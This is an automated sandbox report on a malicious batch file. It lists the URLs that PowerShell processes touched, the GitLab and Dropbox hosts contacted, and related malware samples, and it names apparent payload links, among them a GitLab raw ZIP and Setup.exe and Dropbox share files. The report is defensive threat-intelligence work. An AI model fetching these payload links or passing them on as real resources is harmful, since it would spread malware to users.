                                                                https://a.sprig.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.docsend.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://contoso.com/powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://apis.google.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zippowershell.exe, 0000000E.00000002.2326636099.00000254F1690000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViGpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://login.yahoo.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://docsend.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://gitlab.com(powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.dropbox.compowershell.exe, 0000000C.00000002.2186557399.000001F381368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F38162C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://go.micropowershell.exe, 0000000C.00000002.2186557399.000001F380C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DA123000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024404CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://help.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://customers.gitlab.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://sourcegraph.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?powershell.exe, 0000000C.00000002.2211751712.000001F3F1640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://app.hellofax.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    172.65.251.78
                                                                                                                                                                    		gitlab.comUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                    162.125.66.18
                                                                                                                                                                    		www-env.dropbox-dns.comUnited States
                                                                                                                                                                    		19679DROPBOXUSfalse

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                    Analysis ID:1557463
                                                                                                                                                                    Start date and time:2024-11-18 09:55:07 +01:00
                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 5m 22s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample name:hnl2bose13.bat
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal96.troj.evad.winBAT@30/16@3/2
                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                    • Number of executed functions: 22
                                                                                                                                                                    • Number of non-executed functions: 6
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .bat

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1584 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 3852 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • VT rate limit hit for: hnl2bose13.bat

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    03:56:02API Interceptor61x Sleep call for process: powershell.exe modified

                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                    IPs

                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                    162.125.66.182h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                      13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                          bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                            18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                              bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse

                                                                                                                                                                                        Domains

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        gitlab.com2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        kQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        m2.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        SecuriteInfo.com.FileRepMalware.25861.18393.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        edge-block-www-env.dropbox-dns.com2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.65.15
                                                                                                                                                                                        https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.66.15
                                                                                                                                                                                        www-env.dropbox-dns.com2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.65.18
